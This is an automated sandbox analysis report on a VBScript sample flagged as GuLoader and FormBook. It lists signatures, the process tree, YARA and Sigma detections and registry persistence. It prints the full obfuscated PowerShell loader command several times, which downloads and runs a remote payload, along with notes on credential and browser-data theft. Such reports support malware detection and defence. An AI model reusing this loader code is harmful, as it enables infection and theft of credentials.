Windows Analysis Report
IMG-466573885783553Folketingsmedlemmers.vbs

Overview

General Information

Sample name: IMG-466573885783553Folketingsmedlemmers.vbs
Analysis ID: 1450445
MD5: 622f2e2a15eda9d46a0d8ad2d9c3438a
SHA1: 3c1f879724659f5274a96a9f5dd39c6ced286a4e
SHA256: 0566b9624b3a112acec15ffcc968bbe2543a632412ab1cceafa45bf946962038
Tags: HUNvbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6372 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3744 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7752 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7992 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • dczsDTwoOAPdxoSvtjazysDUwNBh.exe (PID: 5372 cmdline: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 2064 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • dczsDTwoOAPdxoSvtjazysDUwNBh.exe (PID: 6256 cmdline: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 2156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 2344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 1168 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 1268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source | Rule | Description | Author | Strings
amsi64_6600.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7668.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xe19d:$b2: ::FromBase64String(
  • 0xd250:$s1: -join
  • 0x69fc:$s4: +=
  • 0x6abe:$s4: +=
  • 0xace5:$s4: +=
  • 0xce02:$s4: +=
  • 0xd0ec:$s4: +=
  • 0xd232:$s4: +=
  • 0x17302:$s4: +=
  • 0x17382:$s4: +=
  • 0x17448:$s4: +=
  • 0x174c8:$s4: +=
  • 0x1769e:$s4: +=
  • 0x17722:$s4: +=
  • 0xda34:$e4: Get-WmiObject
  • 0xdc23:$e4: Get-Process
  • 0xdc7b:$e4: Start-Process
  • 0x15e1c:$e4: Get-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", ProcessId: 6372, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , CommandLine: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, NewProcessName: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, OriginalFileName: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7992, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , ProcessId: 5372, ProcessName: dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\clip.exe, ProcessId: 2064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1RTLGNO0FD
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", ProcessId: 6372, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 